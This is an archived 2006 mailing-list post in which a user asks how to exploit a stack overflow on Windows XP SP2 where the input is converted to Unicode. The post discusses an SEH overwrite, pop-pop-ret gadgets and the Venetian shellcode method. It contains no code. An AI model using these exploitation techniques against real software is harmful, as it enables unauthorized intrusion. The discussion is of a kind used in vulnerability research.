Vulnerability Development mailing list archives
Exploiting stack-overflows in Unicode/XPSP2 - Further questions
From: Ivan Stroks <ivanstroks () yahoo co nz>
Date: Thu, 8 Jun 2006 01:13:18 +1200 (NZST)
Hi list, I am trying to exploit a stack overflow in an application under Windows XP SP2. The problem is that the content of the buffer I can overflow is converted to Unicode, so I just can control 2 of 4 bytes of the overwritten SEH handler pointer. I have read all papers related to Unicode shellcoding (Venetian method, etc) and understand them fully. My problem is that I am having some issues regarding the way to bring execution back to my code, which is the previous instance. Supposing I can find a pop,pop,ret (or equivalent) "unicode addressable" and I am able to return to my EXCEPTION_REGISTRATION structure, just before my SEH handler. There, I should do a short JMP/CALL to jump over this record, falling in my shellcode. The problem is that, as this value is also encoded in Unicode, I won't be able to specify a JMP/CALL instruction. So...how will I land in my code? I am missing something here? Thanks, IvaN! Send instant messages to your online friends http://au.messenger.yahoo.com
Current thread:
- Exploiting stack-overflows in Unicode/XPSP2 - Further questions Ivan Stroks (Jun 07)